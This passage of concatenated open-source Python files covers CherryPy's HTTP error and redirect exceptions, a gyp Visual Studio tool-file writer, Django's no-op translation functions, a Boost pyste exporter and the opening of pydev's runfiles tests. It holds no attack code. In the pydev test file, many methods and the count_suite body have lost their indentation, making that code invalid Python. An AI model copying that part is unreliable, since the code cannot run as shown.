    """Base class for all exceptions raised by CherryPy."""
class TimeoutError(CherryPyException):
    """Raised when Response.timed_out is detected.

    Note: within this module the name shadows the builtin TimeoutError.
    """
class InternalRedirect(CherryPyException):
    """Exception raised to switch to the handler for a different URL.

    Processing is redirected to another path within the site (the client is
    not informed).  Provide the new path as an argument when raising the
    exception; any params for the new URL go in the querystring.
    """

    def __init__(self, path, query_string=""):
        import cherrypy
        self.request = cherrypy.serving.request

        # An explicit "?" in the path overrides the query_string argument.
        self.query_string = query_string
        if "?" in path:
            path, self.query_string = path.split("?", 1)

        # urljoin copes with both root-relative ("/dummy") and
        # current-path-relative URLs; the current request's own query
        # string is always discarded.
        self.path = _urljoin(self.request.path_info, path)

        CherryPyException.__init__(self, self.path, self.query_string)
class HTTPRedirect(CherryPyException):
    """Exception raised when the request should be redirected.

    This exception will force a HTTP redirect to the URL or URL's you give it.
    The new URL must be passed as the first argument to the Exception,
    e.g., HTTPRedirect(newUrl). Multiple URLs are allowed in a list.
    If a URL is absolute, it will be used as-is. If it is relative, it is
    assumed to be relative to the current cherrypy.request.path_info.

    If one of the provided URLs is a unicode object, it will be encoded
    using the default encoding or the one passed in parameter.

    There are multiple types of redirect, from which you can select via the
    ``status`` argument. If you do not provide a ``status`` arg, it defaults to
    303 (or 302 if responding with HTTP/1.0).

    Examples::

        raise cherrypy.HTTPRedirect("")
        raise cherrypy.HTTPRedirect("/abs/path", 307)
        raise cherrypy.HTTPRedirect(["path1", "path2?a=1&b=2"], 301)

    See :ref:`redirectingpost` for additional caveats.
    """

    status = None
    """The integer HTTP status code to emit."""

    urls = None
    """The list of URL's to emit."""

    encoding = 'utf-8'
    """The encoding when passed urls are not native strings"""

    def __init__(self, urls, status=None, encoding=None):
        import cherrypy
        request = cherrypy.serving.request

        # Accept a single URL as shorthand for a one-element list.
        if isinstance(urls, basestring):
            urls = [urls]

        abs_urls = []
        for url in urls:
            # Coerce to the native str type, using the per-call encoding
            # if given, else the class default.
            url = tonative(url, encoding or self.encoding)

            # Note that urljoin will "do the right thing" whether url is:
            # 1. a complete URL with host (e.g. "http://www.example.com/test")
            # 2. a URL relative to root (e.g. "/dummy")
            # 3. a URL relative to the current path
            # Note that any query string in cherrypy.request is discarded.
            url = _urljoin(cherrypy.url(), url)
            abs_urls.append(url)
        self.urls = abs_urls

        # RFC 2616 indicates a 301 response code fits our goal; however,
        # browser support for 301 is quite messy. Do 302/303 instead. See
        # http://www.alanflavell.org.uk/www/post-redirect.html
        if status is None:
            if request.protocol >= (1, 1):
                status = 303
            else:
                status = 302
        else:
            # Only explicitly-passed statuses are range-checked; the
            # defaults above are known-valid.
            status = int(status)
            if status < 300 or status > 399:
                raise ValueError("status must be between 300 and 399.")

        self.status = status
        CherryPyException.__init__(self, abs_urls, status)

    def set_response(self):
        """Modify cherrypy.response status, headers, and body to represent self.

        CherryPy uses this internally, but you can also use it to create an
        HTTPRedirect object and set its output without *raising* the exception.
        """
        import cherrypy
        response = cherrypy.serving.response
        response.status = status = self.status

        if status in (300, 301, 302, 303, 307):
            response.headers['Content-Type'] = "text/html;charset=utf-8"
            # "The ... URI SHOULD be given by the Location field
            # in the response."
            response.headers['Location'] = self.urls[0]

            # "Unless the request method was HEAD, the entity of the response
            # SHOULD contain a short hypertext note with a hyperlink to the
            # new URI(s)."
            msg = {300: "This resource can be found at <a href='%s'>%s</a>.",
                   301: "This resource has permanently moved to <a href='%s'>%s</a>.",
                   302: "This resource resides temporarily at <a href='%s'>%s</a>.",
                   303: "This resource can be found at <a href='%s'>%s</a>.",
                   307: "This resource has moved temporarily to <a href='%s'>%s</a>.",
                   }[status]
            msgs = [msg % (u, u) for u in self.urls]
            response.body = ntob("<br />\n".join(msgs), 'utf-8')
            # Previous code may have set C-L, so we have to reset it
            # (allow finalize to set it).
            response.headers.pop('Content-Length', None)
        elif status == 304:
            # Not Modified.
            # "The response MUST include the following header fields:
            # Date, unless its omission is required by section 14.18.1"
            # The "Date" header should have been set in Response.__init__

            # "...the response SHOULD NOT include other entity-headers."
            for key in ('Allow', 'Content-Encoding', 'Content-Language',
                        'Content-Length', 'Content-Location', 'Content-MD5',
                        'Content-Range', 'Content-Type', 'Expires',
                        'Last-Modified'):
                if key in response.headers:
                    del response.headers[key]

            # "The 304 response MUST NOT contain a message-body."
            response.body = None
            # Previous code may have set C-L, so we have to reset it.
            response.headers.pop('Content-Length', None)
        elif status == 305:
            # Use Proxy.
            # self.urls[0] should be the URI of the proxy.
            response.headers['Location'] = self.urls[0]
            response.body = None
            # Previous code may have set C-L, so we have to reset it.
            response.headers.pop('Content-Length', None)
        else:
            raise ValueError("The %s status code is unknown." % status)

    def __call__(self):
        """Use this exception as a request.handler (raise self)."""
        raise self
def clean_headers(status):
    """Remove any headers which should not apply to an error response."""
    import cherrypy

    # Headers below described the original content; none of them are
    # meaningful for the error page that replaces it.
    respheaders = cherrypy.serving.response.headers
    doomed = ["Accept-Ranges", "Age", "ETag", "Location", "Retry-After",
              "Vary", "Content-Encoding", "Content-Length", "Expires",
              "Content-Location", "Content-MD5", "Last-Modified"]

    # A 416 (Requested range not satisfiable) response SHOULD keep a
    # Content-Range field with a byte-range-resp-spec of "*" giving the
    # current instance-length; every other error must drop it (and a 206
    # MUST NOT carry a "*" spec at all).
    if status != 416:
        doomed.append("Content-Range")

    for key in doomed:
        if key in respheaders:
            del respheaders[key]
class HTTPError(CherryPyException):
    """Exception used to return an HTTP error code (4xx-5xx) to the client.

    This exception can be used to automatically send a response using a http status
    code, with an appropriate error page. It takes an optional
    ``status`` argument (which must be between 400 and 599); it defaults to 500
    ("Internal Server Error"). It also takes an optional ``message`` argument,
    which will be returned in the response body. See
    `RFC 2616 <http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.4>`_
    for a complete list of available error codes and when to use them.

    Examples::

        raise cherrypy.HTTPError(403)
        raise cherrypy.HTTPError("403 Forbidden", "You are not allowed to access this resource.")
    """

    status = None
    """The HTTP status code. May be of type int or str (with a Reason-Phrase)."""

    code = None
    """The integer HTTP status code."""

    reason = None
    """The HTTP Reason-Phrase string."""

    def __init__(self, status=500, message=None):
        self.status = status
        try:
            # valid_status splits "404 Not Found"-style values into their
            # parts and supplies default reason/message for bare integers.
            self.code, self.reason, defaultmsg = _httputil.valid_status(status)
        except ValueError:
            # An unparseable status is itself reported as a 500.
            raise self.__class__(500, _exc_info()[1].args[0])

        if self.code < 400 or self.code > 599:
            raise ValueError("status must be between 400 and 599.")

        # See http://www.python.org/dev/peps/pep-0352/
        # self.message = message
        self._message = message or defaultmsg
        CherryPyException.__init__(self, status, message)

    def set_response(self):
        """Modify cherrypy.response status, headers, and body to represent self.

        CherryPy uses this internally, but you can also use it to create an
        HTTPError object and set its output without *raising* the exception.
        """
        import cherrypy

        response = cherrypy.serving.response

        clean_headers(self.code)

        # In all cases, finalize will be called after this method,
        # so don't bother cleaning up response values here.
        response.status = self.status
        tb = None
        if cherrypy.serving.request.show_tracebacks:
            # Only expose tracebacks when the config allows it.
            tb = format_exc()
        response.headers['Content-Type'] = "text/html;charset=utf-8"
        response.headers.pop('Content-Length', None)

        content = ntob(self.get_error_page(self.status, traceback=tb,
                                           message=self._message), 'utf-8')
        response.body = content

        _be_ie_unfriendly(self.code)

    def get_error_page(self, *args, **kwargs):
        # Thin hook so subclasses can customize the rendered error page.
        return get_error_page(*args, **kwargs)

    def __call__(self):
        """Use this exception as a request.handler (raise self)."""
        raise self
class NotFound(HTTPError):
    """Exception raised when a URL could not be mapped to any handler (404).

    This is equivalent to raising
    :class:`HTTPError("404 Not Found") <cherrypy._cperror.HTTPError>`.
    """

    def __init__(self, path=None):
        if path is None:
            # Default to the path of the request currently being served.
            import cherrypy
            request = cherrypy.serving.request
            path = "%s%s" % (request.script_name, request.path_info)
        self.args = (path,)
        HTTPError.__init__(self, 404, "The path '%s' was not found." % path)
_HTTPErrorTemplate = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></meta>
<title>%(status)s</title>
<style type="text/css">
#powered_by {
margin-top: 20px;
border-top: 2px solid black;
font-style: italic;
}
#traceback {
color: red;
}
</style>
</head>
<body>
<h2>%(status)s</h2>
<p>%(message)s</p>
<pre id="traceback">%(traceback)s</pre>
<div id="powered_by">
<span>Powered by <a href="http://www.cherrypy.org">CherryPy %(version)s</a></span>
</div>
</body>
</html>
'''
def get_error_page(status, **kwargs):
    """Return an HTML page, containing a pretty error response.

    status should be an int or a str.
    kwargs will be interpolated into the page template.
    """
    import cherrypy

    try:
        code, reason, message = _httputil.valid_status(status)
    except ValueError:
        raise cherrypy.HTTPError(500, _exc_info()[1].args[0])

    # We can't use setdefault here, because some
    # callers send None for kwarg values.
    if kwargs.get('status') is None:
        kwargs['status'] = "%s %s" % (code, reason)
    if kwargs.get('message') is None:
        kwargs['message'] = message
    if kwargs.get('traceback') is None:
        kwargs['traceback'] = ''
    if kwargs.get('version') is None:
        kwargs['version'] = cherrypy.__version__

    # HTML-escape every value so it can be interpolated into the template.
    for k, v in iteritems(kwargs):
        if v is None:
            kwargs[k] = ""
        else:
            kwargs[k] = _escape(kwargs[k])

    # Use a custom template or callable for the error page?
    pages = cherrypy.serving.request.error_page
    error_page = pages.get(code) or pages.get('default')
    if error_page:
        try:
            if hasattr(error_page, '__call__'):
                # Callable pages receive the interpolation values directly.
                return error_page(**kwargs)
            else:
                # Otherwise treat error_page as a template file path.
                data = open(error_page, 'rb').read()
                return tonative(data) % kwargs
        # NOTE(review): bare except looks deliberate here — a failing custom
        # error page must never prevent some page from being served; the
        # failure is appended to the message and the default template used.
        except:
            e = _format_exception(*_exc_info())[-1]
            m = kwargs['message']
            if m:
                m += "<br />"
            m += "In addition, the custom error page failed:\n<br />%s" % e
            kwargs['message'] = m

    return _HTTPErrorTemplate % kwargs
# Minimum body sizes (in bytes) below which IE 5+ substitutes its own
# "friendly" error page for the given status code; see _be_ie_unfriendly.
_ie_friendly_error_sizes = {
    400: 512, 403: 256, 404: 512, 405: 256,
    406: 512, 408: 512, 409: 512, 410: 256,
    500: 512, 501: 512, 505: 512,
}
def _be_ie_unfriendly(status):
    """Pad small error bodies so IE shows them instead of its own page.

    For some statuses, Internet Explorer 5+ shows "friendly error messages"
    instead of our response.body if the body is smaller than a given size.
    Fix this by returning a body over that size (by adding whitespace).
    See http://support.microsoft.com/kb/q218155/
    """
    import cherrypy
    response = cherrypy.serving.response

    min_size = _ie_friendly_error_sizes.get(status, 0)
    if not min_size:
        return
    min_size += 1

    # Since we are issuing an HTTP error status, we assume that
    # the entity is short, and we should just collapse it.
    content = response.collapse_body()
    content_len = len(content)
    if content_len and content_len < min_size:
        # IN ADDITION: the response must be written to IE
        # in one chunk or it will still get replaced! Bah.
        content = content + (ntob(" ") * (min_size - content_len))
        response.body = content
        response.headers['Content-Length'] = str(len(content))
def format_exc(exc=None):
    """Return *exc* (or sys.exc_info() if None) formatted as a traceback string.

    Returns "" when there is no active exception.
    """
    try:
        info = exc if exc is not None else _exc_info()
        if info == (None, None, None):
            return ""
        from traceback import format_exception
        return "".join(format_exception(*info))
    finally:
        # Drop our reference to the exc tuple to avoid traceback
        # reference cycles keeping frames alive.
        del exc
def bare_error(extrabody=None):
    """Produce status, headers, body for a critical error.

    Returns a triple without calling any other questionable functions,
    so it should be as error-free as possible. Call it from an HTTP server
    if you get errors outside of the request.

    If extrabody is None, a friendly but rather unhelpful error message
    is set in the body. If extrabody is a string, it will be appended
    as-is to the body.
    """
    # The whole point of this function is to be a last line-of-defense
    # in handling errors. That is, it must not raise any errors itself;
    # it cannot be allowed to fail. Therefore, don't add to it!
    # In particular, don't call any other CP functions.
    body = ntob("Unrecoverable error in the server.")
    if extrabody is not None:
        if not isinstance(extrabody, bytestr):
            extrabody = extrabody.encode('utf-8')
        body = body + ntob("\n") + extrabody

    headers = [(ntob('Content-Type'), ntob('text/plain')),
               (ntob('Content-Length'), ntob(str(len(body)), 'ISO-8859-1'))]
    return (ntob("500 Internal Server Error"), headers, [body])
| gpl-3.0 |
gugarosa/app_h | node_modules/node-ninja/gyp/pylib/gyp/MSVSToolFile.py | 2736 | 1804 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio project reader/writer."""
import gyp.common
import gyp.easy_xml as easy_xml
class Writer(object):
  """Visual Studio XML tool file writer."""

  def __init__(self, tool_file_path, name):
    """Initializes the tool file.

    Args:
      tool_file_path: Path to the tool file.
      name: Name of the tool file.
    """
    self.tool_file_path = tool_file_path
    self.name = name
    # Accumulated ['Rules', rule1, rule2, ...] easy_xml specification.
    self.rules_section = ['Rules']

  def AddCustomBuildRule(self, name, cmd, description,
                         additional_dependencies,
                         outputs, extensions):
    """Adds a rule to the tool file.

    Args:
      name: Name of the rule.
      description: Description of the rule.
      cmd: Command line of the rule.
      additional_dependencies: other files which may trigger the rule.
      outputs: outputs of the rule.
      extensions: extensions handled by the rule.
    """
    attributes = {
        'Name': name,
        'ExecutionDescription': description,
        'CommandLine': cmd,
        # Multi-valued attributes are semicolon-separated in the project file.
        'Outputs': ';'.join(outputs),
        'FileExtensions': ';'.join(extensions),
        'AdditionalDependencies': ';'.join(additional_dependencies),
    }
    self.rules_section.append(['CustomBuildRule', attributes])

  def WriteIfChanged(self):
    """Writes the tool file."""
    content = ['VisualStudioToolFile',
               {'Version': '8.00',
                'Name': self.name},
               self.rules_section]
    easy_xml.WriteXmlIfChanged(content, self.tool_file_path,
                               encoding="Windows-1252")
| gpl-3.0 |
jarvys/django-1.7-jdb | django/utils/translation/trans_null.py | 84 | 1536 | # These are versions of the functions in django.utils.translation.trans_real
# that don't actually do anything. This is purely for performance, so that
# settings.USE_I18N = False can use this module rather than trans_real.py.
from django.conf import settings
from django.utils.encoding import force_text
from django.utils.safestring import mark_safe, SafeData
def ngettext(singular, plural, number):
    """Pick the singular or plural form; no actual translation happens."""
    return singular if number == 1 else plural


# With I18N disabled, the lazy variant is just the eager one.
ngettext_lazy = ngettext
def ungettext(singular, plural, number):
    # Same as ngettext, but forces the chosen form to a text (unicode) type.
    return force_text(ngettext(singular, plural, number))
def pgettext(context, message):
    # The disambiguation context is irrelevant when translation is disabled.
    return ugettext(message)
def npgettext(context, singular, plural, number):
    # Context is ignored; defer to the plural-aware no-op.
    return ungettext(singular, plural, number)
# No-op implementations: with USE_I18N = False there is nothing to
# (de)activate, and the configured LANGUAGE_CODE is always "current".
activate = lambda x: None
deactivate = deactivate_all = lambda: None
get_language = lambda: settings.LANGUAGE_CODE
get_language_bidi = lambda: settings.LANGUAGE_CODE in settings.LANGUAGES_BIDI
check_for_language = lambda x: True
def gettext(message):
    """Return *message* untranslated, preserving its safe-string marking."""
    return mark_safe(message) if isinstance(message, SafeData) else message
def ugettext(message):
    # Force a text (unicode) return type even for bytestring input.
    return force_text(gettext(message))
# With translation disabled, the noop/lazy/underscore variants are all gettext.
gettext_noop = gettext_lazy = _ = gettext
def to_locale(language):
    """Turn a language name (en-us) into a locale name (en_US)."""
    lang, sep, region = language.partition('-')
    if sep:
        # Lowercase language, uppercase region, joined by an underscore.
        return lang.lower() + '_' + region.upper()
    return language.lower()
def get_language_from_request(request, check_path=False):
    # Language negotiation is disabled; always report the configured code.
    return settings.LANGUAGE_CODE
def get_language_from_path(request):
    # No URL language-prefix handling when I18N is off.
    return None
| bsd-3-clause |
rkq/cxxexp | third-party/src/boost_1_56_0/libs/python/pyste/src/Pyste/VarExporter.py | 54 | 1313 | # Copyright Bruno da Silva de Oliveira 2003. Use, modification and
# distribution is subject to the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from Exporter import Exporter
from settings import *
import utils
#==============================================================================
# VarExporter
#==============================================================================
class VarExporter(Exporter):
    '''Exports a global variable.
    '''

    def __init__(self, info):
        Exporter.__init__(self, info)

    def Export(self, codeunit, exported_names):
        # Honor the user's explicit exclusion of this variable.
        if self.info.exclude: return
        decl = self.GetDeclaration(self.info.name)
        if not decl.type.const:
            # Boost.Python exposes the value by copy, so changes made on the
            # Python side cannot propagate back to the C++ global.
            msg = '---> Warning: The global variable "%s" is non-const:\n' \
                  '    changes in Python will not reflect in C++.'
            print msg % self.info.name
            print
        rename = self.info.rename or self.info.name
        code = self.INDENT + namespaces.python
        code += 'scope().attr("%s") = %s;\n' % (rename, self.info.name)
        codeunit.Write('module', code)

    def Order(self):
        # Variables are emitted first (order 0); ties broken by name.
        return 0, self.info.name

    def Name(self):
        return self.info.name
| mit |
lucafavatella/intellij-community | python/helpers/pydev/tests_pydevd_runfiles/test_runfiles.py | 21 | 19411 | import os.path
import sys
IS_JYTHON = sys.platform.find('java') != -1
# Resolve this file's own path (Jython needs the module-attribute fallback),
# then put the pydevd runfiles directory on sys.path before importing it.
try:
    this_file_name = __file__
except NameError:
    # stupid jython. plain old __file__ isnt working for some reason
    import test_runfiles  #@UnresolvedImport - importing the module itself
    this_file_name = test_runfiles.__file__

desired_runfiles_path = os.path.normpath(os.path.dirname(this_file_name) + "/..")
sys.path.insert(0, desired_runfiles_path)

from _pydev_runfiles import pydev_runfiles_unittest
from _pydev_runfiles import pydev_runfiles_xml_rpc
from _pydevd_bundle import pydevd_io

#remove existing pydev_runfiles from modules (if any), so that we can be sure we have the correct version
if 'pydev_runfiles' in sys.modules:
    del sys.modules['pydev_runfiles']
if '_pydev_runfiles.pydev_runfiles' in sys.modules:
    del sys.modules['_pydev_runfiles.pydev_runfiles']

from _pydev_runfiles import pydev_runfiles
import unittest
import tempfile
import re

# Python 2.3 compatibility: fall back to the sets module when the
# builtin set type is unavailable.
try:
    set
except:
    from sets import Set as set

#this is an early test because it requires the sys.path changed
orig_syspath = sys.path
a_file = pydev_runfiles.__file__
pydev_runfiles.PydevTestRunner(pydev_runfiles.Configuration(files_or_dirs=[a_file]))
file_dir = os.path.dirname(os.path.dirname(a_file))
assert file_dir in sys.path
sys.path = orig_syspath[:]

#remove it so that we leave it ok for other tests
sys.path.remove(desired_runfiles_path)
class RunfilesTest(unittest.TestCase):
def _setup_scenario(
        self,
        path,
        include_tests=None,
        tests=None,
        files_to_tests=None,
        exclude_files=None,
        exclude_tests=None,
        include_files=None,
    ):
    # Build a PydevTestRunner for the given paths/filters and cache each
    # stage of its discovery pipeline (files -> modules -> tests -> filtered).
    self.MyTestRunner = pydev_runfiles.PydevTestRunner(
        pydev_runfiles.Configuration(
            files_or_dirs=path,
            include_tests=include_tests,
            verbosity=1,
            tests=tests,
            files_to_tests=files_to_tests,
            exclude_files=exclude_files,
            exclude_tests=exclude_tests,
            include_files=include_files,
        )
    )
    self.files = self.MyTestRunner.find_import_files()
    self.modules = self.MyTestRunner.find_modules_from_files(self.files)
    self.all_tests = self.MyTestRunner.find_tests_from_modules(self.modules)
    self.filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
def setUp(self):
    # Discover everything under tests_runfiles/samples with no filters.
    self.file_dir = [os.path.abspath(os.path.join(desired_runfiles_path, 'tests_runfiles/samples'))]
    self._setup_scenario(self.file_dir, None)
def test_suite_used(self):
    # Every collected suite must be the pydev-specific suite class.
    for suite in self.all_tests + self.filtered_tests:
        self.assert_(isinstance(suite, pydev_runfiles_unittest.PydevTestSuite))
def test_parse_cmdline(self):
    # Each scenario overwrites sys.argv and checks the resulting Configuration.
    sys.argv = "pydev_runfiles.py ./".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals([sys.argv[1]], configuration.files_or_dirs)
    self.assertEquals(2, configuration.verbosity)  # default value
    self.assertEquals(None, configuration.include_tests)  # default value

    sys.argv = "pydev_runfiles.py ../images c:/temp".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals(sys.argv[1:3], configuration.files_or_dirs)
    self.assertEquals(2, configuration.verbosity)

    sys.argv = "pydev_runfiles.py --verbosity 3 ../junk c:/asdf ".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals(sys.argv[3:], configuration.files_or_dirs)
    self.assertEquals(int(sys.argv[2]), configuration.verbosity)

    sys.argv = "pydev_runfiles.py --include_tests test_def ./".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals([sys.argv[-1]], configuration.files_or_dirs)
    self.assertEquals([sys.argv[2]], configuration.include_tests)

    # Comma-separated include_tests values are split into a list.
    sys.argv = "pydev_runfiles.py --include_tests Abc.test_def,Mod.test_abc c:/junk/".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals([sys.argv[-1]], configuration.files_or_dirs)
    self.assertEquals(sys.argv[2].split(','), configuration.include_tests)

    sys.argv = ('C:\\eclipse-SDK-3.2-win32\\eclipse\\plugins\\org.python.pydev.debug_1.2.2\\pysrc\\pydev_runfiles.py ' +
                '--verbosity 1 ' +
                'C:\\workspace_eclipse\\fronttpa\\tests\\gui_tests\\calendar_popup_control_test.py ').split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals([sys.argv[-1]], configuration.files_or_dirs)
    self.assertEquals(1, configuration.verbosity)

    sys.argv = "pydev_runfiles.py --verbosity 1 --include_tests Mod.test_abc c:/junk/ ./".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals(sys.argv[5:], configuration.files_or_dirs)
    self.assertEquals(int(sys.argv[2]), configuration.verbosity)
    self.assertEquals([sys.argv[4]], configuration.include_tests)

    sys.argv = "pydev_runfiles.py --exclude_files=*.txt,a*.py".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals(['*.txt', 'a*.py'], configuration.exclude_files)

    sys.argv = "pydev_runfiles.py --exclude_tests=*__todo,test*bar".split()
    configuration = pydev_runfiles.parse_cmdline()
    self.assertEquals(['*__todo', 'test*bar'], configuration.exclude_tests)
def test___adjust_python_path_works_for_directories(self):
    orig_syspath = sys.path
    tempdir = tempfile.gettempdir()
    # Constructing a runner for a directory should insert it into sys.path.
    pydev_runfiles.PydevTestRunner(pydev_runfiles.Configuration(files_or_dirs=[tempdir]))
    self.assertEquals(1, tempdir in sys.path)
    sys.path = orig_syspath[:]
def test___is_valid_py_file(self):
    # Only real .py/.pyw sources count, never compiled files or __init__.
    isvalid = self.MyTestRunner._PydevTestRunner__is_valid_py_file
    self.assertEquals(1, isvalid("test.py"))
    self.assertEquals(0, isvalid("asdf.pyc"))
    self.assertEquals(0, isvalid("__init__.py"))
    self.assertEquals(0, isvalid("__init__.pyc"))
    self.assertEquals(1, isvalid("asdf asdf.pyw"))
def test___unixify(self):
    # OS-specific path separators must be normalized to forward slashes.
    unixify = self.MyTestRunner._PydevTestRunner__unixify
    self.assertEquals("c:/temp/junk/asdf.py", unixify("c:SEPtempSEPjunkSEPasdf.py".replace('SEP', os.sep)))
def test___importify(self):
    # File paths become dotted module names, with the .py extension stripped.
    importify = self.MyTestRunner._PydevTestRunner__importify
    self.assertEquals("temp.junk.asdf", importify("temp/junk/asdf.py"))
    self.assertEquals("asdf", importify("asdf.py"))
    self.assertEquals("abc.def.hgi", importify("abc/def/hgi"))
def test_finding_a_file_from_file_system(self):
    # Pointing the runner at a single file should yield exactly that file.
    test_file = "simple_test.py"
    self.MyTestRunner.files_or_dirs = [self.file_dir[0] + test_file]
    files = self.MyTestRunner.find_import_files()
    self.assertEquals(1, len(files))
    self.assertEquals(files[0], self.file_dir[0] + test_file)
def test_finding_files_in_dir_from_file_system(self):
    # Directory discovery must skip compiled files, __init__ modules,
    # backslashed paths and non-Python files.
    self.assertEquals(1, len(self.files) > 0)
    for import_file in self.files:
        self.assertEquals(-1, import_file.find(".pyc"))
        self.assertEquals(-1, import_file.find("__init__.py"))
        self.assertEquals(-1, import_file.find("\\"))
        self.assertEquals(-1, import_file.find(".txt"))
def test___get_module_from_str(self):
    # The helper must return the *leaf* module (os.path), unlike
    # __import__, which returns the top-level package (os).
    my_importer = self.MyTestRunner._PydevTestRunner__get_module_from_str
    my_os_path = my_importer("os.path", True, 'unused')
    from os import path
    import os.path as path2
    self.assertEquals(path, my_os_path)
    self.assertEquals(path2, my_os_path)
    self.assertNotEquals(__import__("os.path"), my_os_path)
    self.assertNotEquals(__import__("os"), my_os_path)
def test_finding_modules_from_import_strings(self):
    # At least one sample module should import successfully.
    self.assertEquals(1, len(self.modules) > 0)
def test_finding_tests_when_no_filter(self):
    # unittest.py will create a TestCase with 0 tests in it
    # since it just imports what is given
    self.assertEquals(1, len(self.all_tests) > 0)
    files_with_tests = [1 for t in self.all_tests if len(t._tests) > 0]
    self.assertNotEquals(len(self.files), len(files_with_tests))
def count_suite(self, tests=None):
total = 0
for t in tests:
total += t.countTestCases()
return total
def test___match(self):
    # A None filter matches everything; otherwise regex semantics apply.
    matcher = self.MyTestRunner._PydevTestRunner__match
    self.assertEquals(1, matcher(None, "aname"))
    self.assertEquals(1, matcher([".*"], "aname"))
    self.assertEquals(0, matcher(["^x$"], "aname"))
    self.assertEquals(0, matcher(["abc"], "aname"))
    self.assertEquals(1, matcher(["abc", "123"], "123"))
def test_finding_tests_from_modules_with_bad_filter_returns_0_tests(self):
    # A filter that matches nothing should produce an empty run.
    self._setup_scenario(self.file_dir, ["NO_TESTS_ARE_SURE_TO_HAVE_THIS_NAME"])
    self.assertEquals(0, self.count_suite(self.all_tests))
def test_finding_test_with_unique_name_returns_1_test(self):
    # Exactly one sample test carries this name.
    self._setup_scenario(self.file_dir, include_tests=["test_i_am_a_unique_test_name"])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEquals(1, self.count_suite(filtered_tests))
def test_finding_test_with_non_unique_name(self):
    # The same test name exists in several sample files, so more than
    # two matches are expected.
    self._setup_scenario(self.file_dir, include_tests=["test_non_unique_name"])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEquals(1, self.count_suite(filtered_tests) > 2)
def test_finding_tests_with_regex_filters(self):
    # Wildcard include, impossible include, and exclude-all scenarios.
    self._setup_scenario(self.file_dir, include_tests=["test_non*"])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEquals(1, self.count_suite(filtered_tests) > 2)

    self._setup_scenario(self.file_dir, ["^$"])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEquals(0, self.count_suite(filtered_tests))

    self._setup_scenario(self.file_dir, None, exclude_tests=["*"])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEquals(0, self.count_suite(filtered_tests))
def test_matching_tests(self):
    # Select by class name, Class.method, multiple selectors, exclusions
    # and file include/exclude lists, checking counts and names each time.
    self._setup_scenario(self.file_dir, None, ['StillYetAnotherSampleTest'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(1, self.count_suite(filtered_tests))

    self._setup_scenario(self.file_dir, None, ['SampleTest.test_xxxxxx1'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(1, self.count_suite(filtered_tests))

    self._setup_scenario(self.file_dir, None, ['SampleTest'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(8, self.count_suite(filtered_tests))

    self._setup_scenario(self.file_dir, None, ['AnotherSampleTest.todo_not_tested'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(1, self.count_suite(filtered_tests))

    self._setup_scenario(self.file_dir, None, ['StillYetAnotherSampleTest', 'SampleTest.test_xxxxxx1'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(2, self.count_suite(filtered_tests))

    self._setup_scenario(self.file_dir, None, exclude_tests=['*'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(self.count_suite(filtered_tests), 0)

    self._setup_scenario(self.file_dir, None, exclude_tests=['*a*'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(self.count_suite(filtered_tests), 6)

    self.assertEqual(
        set(self.MyTestRunner.list_test_names(filtered_tests)),
        set(['test_1', 'test_2', 'test_xxxxxx1', 'test_xxxxxx2', 'test_xxxxxx3', 'test_xxxxxx4'])
    )

    self._setup_scenario(self.file_dir, None, exclude_tests=['*a*', '*x*'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    self.assertEqual(self.count_suite(filtered_tests), 2)

    self.assertEqual(
        set(self.MyTestRunner.list_test_names(filtered_tests)),
        set(['test_1', 'test_2'])
    )

    self._setup_scenario(self.file_dir, None, exclude_files=['simple_test.py'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    names = self.MyTestRunner.list_test_names(filtered_tests)
    self.assert_('test_xxxxxx1' not in names, 'Found: %s' % (names,))

    self.assertEqual(
        set(['test_abc', 'test_non_unique_name', 'test_non_unique_name', 'test_asdf2', 'test_i_am_a_unique_test_name', 'test_non_unique_name', 'test_blank']),
        set(names)
    )

    self._setup_scenario(self.file_dir, None, include_files=['simple3_test.py'])
    filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
    names = self.MyTestRunner.list_test_names(filtered_tests)
    self.assert_('test_xxxxxx1' not in names, 'Found: %s' % (names,))

    self.assertEqual(
        set(['test_non_unique_name']),
        set(names)
    )
    def test_xml_rpc_communication(self):
        """End-to-end check of the xml-rpc notification protocol.

        Installs a fake in-process notification server, runs a hand-picked
        set of sample tests through MyTestRunner, and asserts that the exact
        set of notifications (tests collected, per-test results, run
        finished) was reported, plus the "Ran N tests in" stdout summary.
        """
        notifications = []
        # Fake xml-rpc server: records every notification it receives so the
        # test can compare them against the expected list built below.
        class Server:
